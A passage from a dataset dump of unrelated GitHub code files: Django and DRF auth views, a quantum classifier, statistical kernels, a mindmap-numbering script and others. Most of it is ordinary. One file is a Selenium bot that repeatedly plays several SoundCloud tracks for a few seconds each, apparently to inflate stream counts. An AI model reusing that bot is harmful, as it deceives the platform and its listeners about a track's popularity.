django.urls import path\nfrom .views import add_to_cart, remove_from_cart, OrderSummaryView, CheckoutView, OrderHistoryView\n\napp_name = \"orders\"\n\nurlpatterns = [\n path('checkout/', CheckoutView.as_view(), name=\"checkout\"),\n path('order-summary/', OrderSummaryView.as_view(), name=\"summary\"),\n path('order-history/', OrderHistoryView.as_view(), name=\"history\"),\n path('add-to-cart/', add_to_cart, name=\"add-to-cart\"),\n path('remove-from-cart/', remove_from_cart, name=\"remove-from-cart\")\n]","repo_name":"EvgeniiKlepilin/django-pizza","sub_path":"djangopizza/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"37541298945","text":"import tkinter as tk\nfrom math import pi\n\ndef hitung_bola():\n try:\n jari_jari = float(jari_jari_entry.get())\n luas_permukaan = round(4 * pi * jari_jari**2, 2)\n volume = round((4/3) * pi * jari_jari**3, 2)\n luas_permukaan_label.config(text=f'Luas Permukaan Bola: {luas_permukaan}')\n volume_label.config(text=f'Volume Bola: {volume}')\n except ValueError:\n luas_permukaan_label.config(text='Masukkan angka valid')\n volume_label.config(text='')\n\nroot = tk.Tk()\nroot.title(\"Kalkulator Bola\")\n\n# Membuat label dan entry untuk input jari-jari bola\ninput_frame = tk.Frame(root)\ninput_frame.pack(pady=10)\n\njari_jari_label = tk.Label(input_frame, text=\"Jari-Jari Bola:\")\njari_jari_label.pack(side='left', padx=5)\njari_jari_entry = tk.Entry(input_frame)\njari_jari_entry.pack(side='left', padx=5)\n\n# Membuat tombol untuk menghitung\nhitung_button = tk.Button(root, text=\"Hitung\", command=hitung_bola)\nhitung_button.pack(pady=5)\n\n# Membuat label untuk menampilkan hasil perhitungan\nhasil_frame = tk.Frame(root)\nhasil_frame.pack(pady=10)\n\nluas_permukaan_label = tk.Label(hasil_frame, text=\"Luas Permukaan Bola:\")\nluas_permukaan_label.pack(side='left', padx=5)\nvolume_label = tk.Label(hasil_frame, text=\"Volume Bola:\")\nvolume_label.pack(side='left', padx=5)\n\n# Memulai loop Tkinter\nroot.mainloop()\n","repo_name":"drrri-py/php-luas-tabung","sub_path":"Tugas 2/bola.py","file_name":"bola.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"29832821663","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import status\nfrom user_app.api.serializers import RegistrationSerializer, LoginSerializer\n# from user_app import models # for load create_auth_token method when view load => can use Token.objects.get (for TokenAuthentication)\nfrom django.contrib.auth import authenticate\n# from rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\n\n# @api_view(http_method_names=['POST'])\n# def logout(request):\n# if request.method == 'POST':\n# request.user.auth_token.delete()\n# return Response(status=status.HTTP_200_OK)\n\n\n# @api_view(http_method_names=['POST'])\n# def registration(request):\n# if request.method == 'POST':\n# serializer = RegistrationSerializer(data=request.data)\n# data = {}\n# if serializer.is_valid():\n# account = serializer.save()\n# data['username'] = account.username\n# data['password'] = account.password\n# # token = Token.objects.get(user=account)\n# token = Token.objects.get_or_create(user=account)\n# data['token'] = token[0].key\n\n# else:\n# data = serializer.errors\n\n# return Response(data)\n\n@api_view(http_method_names=['POST'])\ndef login(request):\n serializer = LoginSerializer(data=request.data)\n if serializer.is_valid():\n user = authenticate(\n request, username=serializer.validated_data['username'], password=serializer.validated_data['password'])\n if user is not None:\n refresh = RefreshToken.for_user(user)\n data = {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n 'user': serializer.data\n }\n return Response(data, status=status.HTTP_200_OK)\n\n return Response({\n 'error_messages': serializer.errors,\n 'error_code': 400\n }, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(http_method_names=['POST'])\ndef registration(request):\n serializer = RegistrationSerializer(data=request.data)\n data = {}\n if serializer.is_valid():\n account = serializer.save()\n refresh = RefreshToken.for_user(account)\n data = {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n 'user': serializer.data\n }\n else:\n data = serializer.errors\n\n return Response(data)\n","repo_name":"PhamQuang-512/IMDB-api-clone","sub_path":"watchmate/user_app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"45028878979","text":"class Essen(object):\n indent = \" \"\n tag_indent = \" \"\n\n\n def __init__(self, sorte, name, suppe, preis):\n self.sorte = sorte\n self.name = name\n self.suppe = suppe\n self.preis = preis\n \n def toString(self):\n return self.sorte + \": \" + self.name + \"; Suppe: \" + self.suppe + \"; Preis: \" + self.preis\n\n def tag(self, name, value):\n return self.indent + \"<\" + name + \">\" + value + \"\\n\"\n\n def asXML(self):\n xml = self.tag_indent + \"\\n\"\n xml += self.tag(\"sorte\", self.sorte)\n xml += self.tag(\"name\", self.name)\n xml += self.tag(\"suppe\", self.suppe)\n xml += self.tag(\"preis\", self.preis)\n xml += self.tag_indent + \"\\n\"\n return xml\n \nclass MensaKategorie:\n tag_indent = \" \"\n \n def __init__(self, name, essen):\n self.name = name\n self.essen = essen\n \n def asXML(self):\n xml = self.tag_indent + '\\n\"\n for e in self.essen:\n xml += e.asXML()\n xml += self.tag_indent + \"\\n\"\n return xml\n\nclass MensaTag:\n tag_indent = \" \"\n \n def __init__(self, name, kategorien):\n self.name = name\n self.kategorien = kategorien\n \n def asXML(self):\n xml = self.tag_indent + '\\n\"\n for k in self.kategorien:\n xml += k.asXML()\n xml += self.tag_indent + \"\\n\"\n return xml\n \nclass MensaPlan:\n def __init__(self, tage):\n self.tage = tage \n\n def asXML(self):\n xml = \"\\n\"\n for t in self.tage:\n xml += t.asXML()\n xml += \"\\n\"\n return xml\n ","repo_name":"midi1986/ihsmamdi03app2010","sub_path":"server/trunk/src/mensa/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"8726134692","text":"'''\nCreated on 8 Dec 2016\n\n@author: Andrew Roth\n'''\nfrom __future__ import division\n\nfrom collections import namedtuple\n\nimport numpy as np\nimport random\n\nfrom pgsm.math_utils import exp_normalize, log_sum_exp\nfrom pgsm.particle_utils import get_constrained_path\n\n\nSplitMergeParticle = namedtuple(\n 'SplitMergeParticle',\n ('block_idx', 'block_params', 'generation', 'log_w', 'parent_particle'),\n)\n\n\nAnnealedSplitMergeParticle = namedtuple(\n 'AnnealedSplitMergeParticle',\n ('block_idx', 'block_params', 'generation', 'log_annealing_correction', 'log_w', 'parent_particle'),\n)\n\n\nclass AbstractSplitMergKernel(object):\n\n def __init__(self, dist, partition_prior):\n self.dist = dist\n\n self.partition_prior = partition_prior\n\n def can_add_block(self, parent_particle):\n '''\n Check if a descendant particle can add a new block.\n '''\n if parent_particle is None:\n return True\n\n else:\n return (parent_particle.generation < self.num_anchors)\n\n def copy_particle(self, particle):\n return SplitMergeParticle(\n particle.block_idx,\n tuple([x.copy() for x in particle.block_params]),\n particle.generation,\n particle.log_w,\n particle.parent_particle\n )\n\n def create_initial_particle(self, data_point):\n return self.create_particle(0, data_point, None)\n\n def create_particle(self, block_idx, data_point, parent_particle, log_q=None, log_q_norm=None):\n '''\n Create a descendant particle from a parent particle by adding data point to a block.\n '''\n block_params = self._get_block_params(block_idx, data_point, parent_particle)\n\n if log_q is None:\n log_q = self.get_log_q(data_point, parent_particle)\n\n if log_q_norm is None:\n log_q_norm = log_sum_exp(np.array(log_q.values()))\n\n return self._create_particle(block_idx, block_params, data_point, log_q, log_q_norm, parent_particle)\n\n def log_target_density(self, block_params):\n num_blocks = len(block_params)\n\n log_g = self.partition_prior.log_tau_1(num_blocks + self.num_outside_blocks)\n\n for params in block_params:\n log_g += self.partition_prior.log_tau_2(params.N)\n\n log_g += self.dist.log_marginal_likelihood(params)\n\n return log_g\n\n def propose(self, data_point, parent_particle, seed=None):\n '''\n Propose a particle for t given a particle from t - 1 and a data point.\n '''\n if seed is not None:\n random.seed(seed)\n\n np.random.seed(seed)\n\n log_q = self.get_log_q(data_point, parent_particle)\n\n block_probs, log_q_norm = exp_normalize(np.array(log_q.values()))\n\n block_idx = np.random.multinomial(1, block_probs).argmax()\n\n block_idx = log_q.keys()[block_idx]\n\n return self.create_particle(block_idx, data_point, parent_particle, log_q=log_q, log_q_norm=log_q_norm)\n\n def setup(self, anchors, clustering, data, sigma, set_constrained_path=True):\n '''\n Setup kernel for a split merge run based on anchors, current clustering, data and permutation of indices.\n '''\n self.num_anchors = len(anchors)\n\n self.num_generations = len(sigma)\n\n num_anchor_blocks = len(np.unique([clustering[a] for a in anchors]))\n\n num_global_blocks = len(np.unique(clustering))\n\n self.num_outside_blocks = num_global_blocks - num_anchor_blocks\n\n if set_constrained_path:\n self.constrained_path = get_constrained_path(clustering[sigma], data[sigma], self)\n\n def _get_block_params(self, block_idx, data_point, parent_particle):\n '''\n Get posterior parameters from parent particle updated by adding data_point to a block.\n '''\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = [x.copy() for x in parent_particle.block_params]\n\n if block_idx > (len(block_params) - 1):\n params = self.dist.create_params()\n\n params.increment(data_point)\n\n block_params.append(params)\n\n else:\n block_params[block_idx].increment(data_point)\n\n return block_params\n\n def _get_generation(self, parent_particle):\n if parent_particle is None:\n generation = 1\n\n else:\n generation = parent_particle.generation + 1\n\n return generation\n\n def get_log_q(self, data_point, parent_particle):\n '''\n Get the unnormalized proposal\n '''\n raise NotImplementedError\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, log_q_norm, parent_particle):\n raise NotImplementedError\n\n\nclass UniformSplitMergeKernel(AbstractSplitMergKernel):\n '''\n Propose next state uniformly from available states. This is for pedagogical purposes. The implementation is slow.\n '''\n\n def get_log_q(self, data_point, parent_particle):\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = parent_particle.block_params\n\n log_q = {}\n\n for block_idx, _ in enumerate(block_params):\n log_q[block_idx] = 0\n\n if self.can_add_block(parent_particle):\n block_idx = len(block_params)\n\n log_q[block_idx] = 0\n\n return log_q\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, log_q_norm, parent_particle):\n # Initial particle\n if parent_particle is None:\n log_w = self.log_target_density(block_params) - log_q_norm\n\n else:\n # Ratio of target densities\n log_w = self.log_target_density(block_params) - self.log_target_density(parent_particle.block_params)\n\n # Proposal contribution\n log_w -= log_q_norm\n\n return SplitMergeParticle(\n block_idx=block_idx,\n block_params=tuple(block_params),\n generation=self._get_generation(parent_particle),\n log_w=log_w,\n parent_particle=parent_particle\n )\n\n\nclass FullyAdaptedSplitMergeKernel(AbstractSplitMergKernel):\n '''\n Propose next state with probability proportional to target density.\n '''\n\n def get_log_q(self, data_point, parent_particle):\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = parent_particle.block_params\n\n log_q = {}\n\n for block_idx, params in enumerate(block_params):\n log_q[block_idx] = self.partition_prior.log_tau_2_diff(params.N)\n\n log_q[block_idx] += self.dist.log_predictive_likelihood(data_point, params)\n\n if self.can_add_block(parent_particle):\n block_idx = len(block_params)\n\n params = self.dist.create_params()\n\n num_blocks = len(block_params)\n\n log_q[block_idx] = self.partition_prior.log_tau_1_diff(self.num_outside_blocks + num_blocks)\n\n log_q[block_idx] += self.partition_prior.log_tau_2_diff(params.N)\n\n log_q[block_idx] += self.dist.log_predictive_likelihood(data_point, params)\n\n return log_q\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, log_q_norm, parent_particle):\n return SplitMergeParticle(\n block_idx=block_idx,\n block_params=tuple(block_params),\n generation=self._get_generation(parent_particle),\n log_w=log_q_norm,\n parent_particle=parent_particle\n )\n\n\nclass AnnealedSplitMergeKernel(AbstractSplitMergKernel):\n '''\n Propose next state uniformly until all anchors are added then use fully adapted proposal.\n '''\n\n def copy_particle(self, particle):\n return AnnealedSplitMergeParticle(\n particle.block_idx,\n tuple([x.copy() for x in particle.block_params]),\n particle.generation,\n particle.log_annealing_correction,\n particle.log_w,\n particle.parent_particle\n )\n\n def get_log_q(self, data_point, parent_particle):\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = parent_particle.block_params\n\n log_q = {}\n\n # Sample uniformly from possible states if we are still adding anchor points\n if self.can_add_block(parent_particle):\n for block_idx, _ in enumerate(block_params):\n log_q[block_idx] = 0\n\n block_idx = len(block_params)\n\n log_q[block_idx] = 0\n\n # Otherwise do the normally fully adapted proposal plus the annealing correction\n else:\n for block_idx, params in enumerate(block_params):\n log_q[block_idx] = parent_particle.log_annealing_correction\n\n log_q[block_idx] += self.partition_prior.log_tau_2_diff(params.N)\n\n log_q[block_idx] += self.dist.log_predictive_likelihood(data_point, params)\n\n return log_q\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, log_q_norm, parent_particle):\n generation = self._get_generation(parent_particle)\n\n if generation < self.num_anchors:\n log_annealing_correction = None\n\n elif generation == self.num_anchors:\n n = self.num_generations\n\n s = self.num_anchors\n\n if n == s:\n log_annealing_correction = None\n\n log_q_norm = self.log_target_density(block_params)\n\n else:\n log_annealing_correction = (1 / (n - s)) * self.log_target_density(block_params)\n\n else:\n log_annealing_correction = parent_particle.log_annealing_correction\n\n return AnnealedSplitMergeParticle(\n block_idx=block_idx,\n block_params=tuple(block_params),\n generation=generation,\n log_annealing_correction=log_annealing_correction,\n log_w=log_q_norm,\n parent_particle=parent_particle\n )\n","repo_name":"Roth-Lab/pgsm","sub_path":"pgsm/smc/kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":10050,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"30"} +{"seq_id":"73335838484","text":"import requests\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nimport time\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import datetime\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n\nSongDuration = 3\n\n\ndef SoManyNights():\n driver.get(\"https://soundcloud.com/eddison-duolo-546732382/so-many-nights-ed-tank\")\n high_play_btn = driver.find_element_by_xpath('//*[@id=\"content\"]/div/div[2]/div/div[2]/div[2]/div/div/div[1]/a')\n high_play_btn.click()\n time.sleep(SongDuration)\n low_pause_btn = driver.find_element_by_xpath('//*[@id=\"app\"]/div[4]/section/div/div[3]/button[2]')\n low_pause_btn.click()\n time.sleep(1)\n\ndef NewTab(url):\n\n driver.execute_script(\"window.open('');\")\n driver.switch_to.window(driver.window_handles[1])\n driver.get(url)\n time.sleep(1)\n\ndef PlayandStop():\n high_play_btn = driver.find_element_by_xpath('//*[@id=\"content\"]/div/div[2]/div/div[2]/div[2]/div/div/div[1]/a')\n high_play_btn.click()\n time.sleep(SongDuration)\n low_pause_btn = driver.find_element_by_xpath('//*[@id=\"app\"]/div[4]/section/div/div[3]/button[2]')\n low_pause_btn.click()\n\n\ndef CloseAllWindows():\n driver.quit()\n\n\nfor x in range (1,120):\n\n #Option to run headless\n #driver = webdriver.Chrome(\"/Users/grahamlenert/Downloads/chromedriverowen\", options=chrome_options)\n\n #Option to run with head\n #driver = webdriver.Chrome(\"/Users/grahamlenert/Downloads/chromedriverowen\")\n\n driver = webdriver.Chrome(ChromeDriverManager().install())\n\n #SoManyNights()\n\n NewTab('https://soundcloud.com/eddison-duolo-546732382/landr-yo-vibe-2-0-lil-pacco')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/pacco-434-mafia-balanced')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/landr-murda-pacco-2-8-21')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/landr-intro-song-pacco')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/lil-pacco-dont-go-balanced')\n PlayandStop()\n\n\n CloseAllWindows()\n\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Current Time =\", current_time)\n print(x)\n time.sleep(1)\n","repo_name":"glenert41/Ed_Tank_Repo","sub_path":"MultiSongStreaming.py","file_name":"MultiSongStreaming.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"12781371490","text":"#! /usr/bin/python3\n\nimport sys\nimport pennylane as qml\nimport numpy as np\n\n\ndef classify_data(X_train, Y_train, X_test):\n \"\"\"Develop and train your very own variational quantum classifier.\n\n Use the provided training data to train your classifier. The code you write\n for this challenge should be completely contained within this function\n between the # QHACK # comment markers. The number of qubits, choice of\n variational ansatz, cost function, and optimization method are all to be\n developed by you in this function.\n\n Args:\n X_train (np.ndarray): An array of floats of size (250, 3) to be used as training data.\n Y_train (np.ndarray): An array of size (250,) which are the categorical labels\n associated to the training data. The categories are labeled by -1, 0, and 1.\n X_test (np.ndarray): An array of floats of (50, 3) to serve as testing data.\n\n Returns:\n str: The predicted categories of X_test, converted from a list of ints to a\n comma-separated string.\n \"\"\"\n\n # Use this array to make a prediction for the labels of the data in X_test\n predictions = []\n\n # QHACK #\n np.random.seed(42)\n DEBUG = False\n\n def normalize(data):\n return (data - np.min(data)) / (np.max(data) - np.min(data))\n\n def one_versus_rest_split(x, y, label):\n class_mask = (y == label)\n other_mask = ~class_mask\n\n relabeled = np.empty_like(y)\n relabeled[class_mask] = 1.0\n relabeled[other_mask] = -1.0\n\n class_idx = np.where(class_mask)[0]\n other_idx = np.where(other_mask)[0]\n\n num_class_samples = class_mask.sum()\n other_idx_subsampled = np.random.choice(other_idx, size=num_class_samples, replace=False)\n\n idx = np.concatenate((class_idx, other_idx_subsampled))\n idx.sort(kind='mergesort')\n\n return x[idx], relabeled[idx]\n\n def square_loss(labels, predictions):\n loss = 0\n for l, p in zip(labels, predictions):\n loss = loss + (l - p) ** 2\n\n loss = loss / len(labels)\n return loss\n\n def accuracy(labels, predictions):\n\n loss = 0\n for l, p in zip(labels, predictions):\n if abs(l - p) < 1e-5:\n loss = loss + 1\n loss = loss / len(labels)\n\n return loss\n\n n_qubits = 3\n dev = qml.device(\"default.qubit\", wires=n_qubits, shots=100)\n\n @qml.qnode(dev)\n def circuit(inputs, weights):\n qml.templates.AngleEmbedding(inputs, wires=range(n_qubits))\n qml.templates.StronglyEntanglingLayers(weights, wires=range(n_qubits))\n return qml.expval(qml.PauliZ(0))\n\n\n def variational_classifier(var, inputs):\n weights = var[0]\n bias = var[1]\n return circuit(inputs, weights) + bias\n\n def cost(weights, features, labels):\n predictions = [variational_classifier(weights, f) for f in features]\n return square_loss(labels, predictions)\n\n def train_classifier(x_train, y_train, x_test, y_test, shots=50):\n from pennylane.optimize import NesterovMomentumOptimizer, AdamOptimizer\n\n old_shots = dev.shots\n dev.shots = shots\n\n num_train = len(x_train)\n num_layers = 4\n var_init = (qml.init.strong_ent_layers_uniform(num_layers, n_qubits, 3), 0.0)\n stepsize = 0.1\n opt = NesterovMomentumOptimizer(stepsize)\n batch_size = 5\n maxit = 20\n\n # train the variational classifier\n var = var_init\n for it in range(maxit):\n # Update the weights by one optimizer step\n batch_index = np.random.randint(0, num_train, (batch_size,))\n x_train_batch = x_train[batch_index]\n y_train_batch = y_train[batch_index]\n var = opt.step(lambda v: cost(v, x_train_batch, y_train_batch), var)\n\n # stepsize *= 0.95\n # opt.update_stepsize(stepsize)\n\n # Compute predictions on train and validation set\n predictions_train = [np.sign(variational_classifier(var, f)) for f in x_train]\n acc_train = accuracy(y_train, predictions_train)\n\n if DEBUG:\n predictions_val = [np.sign(variational_classifier(var, f)) for f in x_test]\n acc_val = accuracy(y_test, predictions_val)\n\n print(\n \"Iter: {:5d} | Cost: {:0.7f} | Acc train: {:0.7f} | Acc validation: {:0.7f} \"\n \"\".format(it + 1, cost(var, x_train, y_train), acc_train, acc_val)\n )\n\n if acc_train > 0.95:\n break\n\n dev.shots = old_shots\n return var\n\n def predict(inputs, classifier_dict):\n predictions = []\n labels = np.array(list(classifier_dict.keys()))\n\n for inp in inputs:\n preds = np.array([variational_classifier(weights, inp) for weights in classifier_dict.values()])\n predictions.append(labels[np.argmax(preds)])\n\n return np.array(predictions)\n\n X_train = normalize(X_train)\n\n X_test = normalize(X_test)\n Y_test = np.array([1,0,-1,0,-1,1,-1,-1,0,-1,1,-1,0,1,0,-1,-1,0,0,1,1,0,-1,0,0,-1,0,\n -1,0,0,1,1,-1,-1,-1,0,-1,0,1,0,-1,1,1,0,-1,-1,-1,-1,0,0])\n\n # num_data = len(Y_train)\n # num_train = int(0.75 * num_data)\n # index = np.random.permutation(range(num_data))\n labels = [-1.0, 0.0, 1.0]\n vars = {}\n\n for l in labels:\n xtr, ytr = one_versus_rest_split(X_train, Y_train, l)\n xte, yte = one_versus_rest_split(X_test, Y_test, l)\n vars[l] = train_classifier(xtr, ytr, xte, yte)\n\n predictions = predict(X_test, vars)\n if DEBUG:\n print(accuracy(Y_test, predictions))\n # QHACK #\n\n\n predictions = predictions.astype(np.int)\n\n return array_to_concatenated_string(predictions)\n\n\ndef array_to_concatenated_string(array):\n \"\"\"DO NOT MODIFY THIS FUNCTION.\n\n Turns an array of integers into a concatenated string of integers\n separated by commas. (Inverse of concatenated_string_to_array).\n \"\"\"\n return \",\".join(str(x) for x in array)\n\n\ndef concatenated_string_to_array(string):\n \"\"\"DO NOT MODIFY THIS FUNCTION.\n\n Turns a concatenated string of integers separated by commas into\n an array of integers. (Inverse of array_to_concatenated_string).\n \"\"\"\n return np.array([int(x) for x in string.split(\",\")])\n\n\ndef parse_input(giant_string):\n \"\"\"DO NOT MODIFY THIS FUNCTION.\n\n Parse the input data into 3 arrays: the training data, training labels,\n and testing data.\n\n Dimensions of the input data are:\n - X_train: (250, 3)\n - Y_train: (250,)\n - X_test: (50, 3)\n \"\"\"\n X_train_part, Y_train_part, X_test_part = giant_string.split(\"XXX\")\n\n X_train_row_strings = X_train_part.split(\"S\")\n X_train_rows = [[float(x) for x in row.split(\",\")] for row in X_train_row_strings]\n X_train = np.array(X_train_rows)\n\n Y_train = concatenated_string_to_array(Y_train_part)\n\n X_test_row_strings = X_test_part.split(\"S\")\n X_test_rows = [[float(x) for x in row.split(\",\")] for row in X_test_row_strings]\n X_test = np.array(X_test_rows)\n\n return X_train, Y_train, X_test\n\n\nif __name__ == \"__main__\":\n # DO NOT MODIFY anything in this code block\n\n X_train, Y_train, X_test = parse_input(sys.stdin.read())\n output_string = classify_data(X_train, Y_train, X_test)\n print(f\"{output_string}\")\n","repo_name":"pdebus/qhack2021","sub_path":"circuit_training_500/circuit_training_500_template.py","file_name":"circuit_training_500_template.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"5902175381","text":"#!/usr/bin/env python\n\nimport sys,json\n\nlevels_count = dict()\n\ndef do_ideas(depth, node):\n\tglobal levels_count\n\n\tif not depth in levels_count:\n\t\tlevels_count.update({depth: 0})\n\n\tfor key, value in iter(sorted(node.get('ideas', dict()).iteritems(), key=lambda t: float(t[0]))):\n\t\tadd_label(depth+1, value)\n\treturn\n\ndef add_label(depth, node):\n\tglobal levels_count\n\n\tdo_ideas(depth, node)\n\n\tif node.get('title', None) == 'AND':\n\t\treturn\n\n\tif node.get('title', None) == '...':\n\t\treturn\n\n\tif not node.get('title', '').find('(*)') == -1:\n\t\treturn\n\n\tworking_title = \"%s.%s %s\" % (depth, levels_count[depth], node.get('title', None))\n\n\tlevels_count[depth] += 1\n\n\tif not node.get('title', None).startswith(working_title):\n\t\tnode.update({'title': working_title})\n\treturn\n\ndepth=0\n\nif len(sys.argv) < 1:\n\tfd_in=sys.stdin\nelse:\n\tfd_in=open(sys.argv[1], 'r')\n\ndata = json.load(fd_in)\n\nif len(sys.argv) < 1:\n\tfd_out = sys.stdout\nelse:\n\tfd_in.close()\n\tfd_out=open(sys.argv[1],'w')\n\nif 'id' in data and data['id'] == 'root':\n\t#version 2 mindmup\n\tdo_ideas(depth, data['ideas']['1'])\nelse:\n\tdo_ideas(depth, data)\n\nfd_out.write(json.dumps(data, indent=2, sort_keys=True))\n\nif len(sys.argv) >= 1:\n\tfd_out.close()\n\n","repo_name":"gunnarx/mindmup-as-attack-trees","sub_path":"scripts/add-numbered-ids.py","file_name":"add-numbered-ids.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"30"} +{"seq_id":"39769972094","text":"class Solution:\n def findLHS(self, nums: List[int]) -> int:\n counterNumber = {}\n for i in nums:\n if i not in counterNumber:\n counterNumber[i] = 0\n counterNumber[i] += 1\n\n counter = 0\n temp = list(sorted(counterNumber.items(), key=lambda x: (x[0], x[1])))\n\n for i in range(len(temp) - 1):\n if abs(temp[i][0] - temp[i + 1][0]) == 1:\n if temp[i][1] + temp[i + 1][1] > counter:\n counter = temp[i][1] + temp[i + 1][1]\n return (counter)","repo_name":"Navjot8/LeetCodeSolutions","sub_path":"Longest Harmonious Subsequence.py","file_name":"Longest Harmonious Subsequence.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72180717524","text":"import unittest\nfrom TestUtils import TestLexer\n\n\nclass LexerSuite(unittest.TestCase):\n\n def test_lowercase_identifier(self):\n \"\"\"test identifiers\"\"\"\n self.assertTrue(TestLexer.test(\"\"\"\n main: function void () {\n a = readInteger();\n //b = readFloat();\n //c = readBoolean();\n //d = readString();\n }\n \"\"\", \"abc,\", 101))\n","repo_name":"hongnhat195/PPL-2","sub_path":"src/test/LexerSuite.py","file_name":"LexerSuite.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72891486805","text":"\"\"\"\n\nariel@sacrafamiglia\n23/04/2022\n\nStatistically testing the effect of the nebular continuum emission in the derived properties\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table\nfrom toolbox import plot_tools\nfrom pysinopsis.utils import calc_mwage\n\ndata_dir = '/home/ariel/Workspace/GASP/HST/Data/'\n\nparametric = Table.read(data_dir + 'tail_all31_default_halpha_bagpipes_results.fits')\nnonparametric = Table.read(data_dir + 'tail_all31_default_nonparametric_halpha_bagpipes_results.fits')\nnonparametric_hacked = Table.read(data_dir + 'tail_all31_default_nonparametric_halpha_bagpipes_results_nebcont_hacked'\n '.fits')\n\ncases = (nonparametric['stellar_mass'] - parametric['stellar_mass'] > 1)\nprint(parametric['blob_id'][cases])\n\nplt.figure()\nplt.scatter(nonparametric['stellar_mass'], parametric['stellar_mass'])\nplt.scatter(nonparametric['stellar_mass'][cases], parametric['stellar_mass'][cases])\nx = np.linspace(np.min(nonparametric['stellar_mass']) - 1, np.max(nonparametric['stellar_mass']) + 1)\ny = x\nplt.plot(x, y, '--k')\nplt.xlabel('Nonparametric Stellar Mass', fontsize=20)\nplt.ylabel('Parametric Stellar Mass', fontsize=20)\n\nage_bins = [0, 2.0e6, 4.0e6, 7.0e6, 2.0e7, 5.5e7, 2.0e8, 5.5e8, 1.0e9, 3.0e9,\n 5.75e9, 1.0e10, 1.4e10]\nage_bins_len = [age_bins[i+1]-age_bins[i] for i in range(12)]\nage_bins_mid = [(age_bins[i+1]+age_bins[i])/2 for i in range(12)]\n\nold_component = np.log10(np.array([np.sum(10**nonparametric['formed_mass'][i][9:])\n for i in range(len(nonparametric))]))\n\nplt.figure()\nplt.scatter(old_component, nonparametric['stellar_mass'] - parametric['stellar_mass'])\nplt.scatter(old_component[cases], (nonparametric['stellar_mass'] - parametric['stellar_mass'])[cases])\nplt.xlabel('Mass Formed in The Old Component', fontsize=20)\nplt.ylabel('Current Stellar Mass Difference', fontsize=20)\n\n# plt.scatter(nonparametric['mwage'], mwage_nonparametric)\n# x = np.linspace(np.min(nonparametric['mwage']) - 1, np.max(nonparametric['mwage']) + 1)\n# y = x\n# plt.plot(x, y, '--k')\n\n# plt.scatter(nonparametric['stellar_mass'], parametric['stellar_mass'])\n# x = np.linspace(np.min(nonparametric['stellar_mass']) - 1, np.max(nonparametric['stellar_mass']) + 1)\n# y = x\n# plt.plot(x, y, '--k')\n\nold_component = np.log10(np.array([np.sum(10**nonparametric['formed_mass'][i][9:])\n for i in range(len(nonparametric))]))\nold_component_hacked = np.log10(np.array([np.sum(10**nonparametric_hacked['formed_mass'][i][9:])\n for i in range(len(nonparametric_hacked))]))\n\nplt.scatter(old_component-old_component_hacked, nonparametric['stellar_mass']-nonparametric_hacked['stellar_mass'])","repo_name":"arielwrl/HST_blobs","sub_path":"BAGPIPES/test_nebular_continuum_effect.py","file_name":"test_nebular_continuum_effect.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"37179047485","text":"from math import sqrt\r\n\r\n\r\nx1 = int(input('Введите x-координату первой вершины треугольника: '))\r\ny1 = int(input('Введите y-координату первой вершины треугольника: '))\r\nx2 = int(input('Введите x-координату второй вершины треугольника: '))\r\ny2 = int(input('Введите y-координату второй вершины треугольника: '))\r\nx3 = int(input('Введите x-координату третьей вершины треугольника: '))\r\ny3 = int(input('Введите y-координату третьей вершины треугольника: '))\r\n\r\nABx = x2 - x1 # Находим координаты векторов-сторон треугольника\r\nABy = y2 - y1\r\nBCx = x3 - x2\r\nBCy = y3 - y2\r\nACx = x3 - x1\r\nACy = y3 - 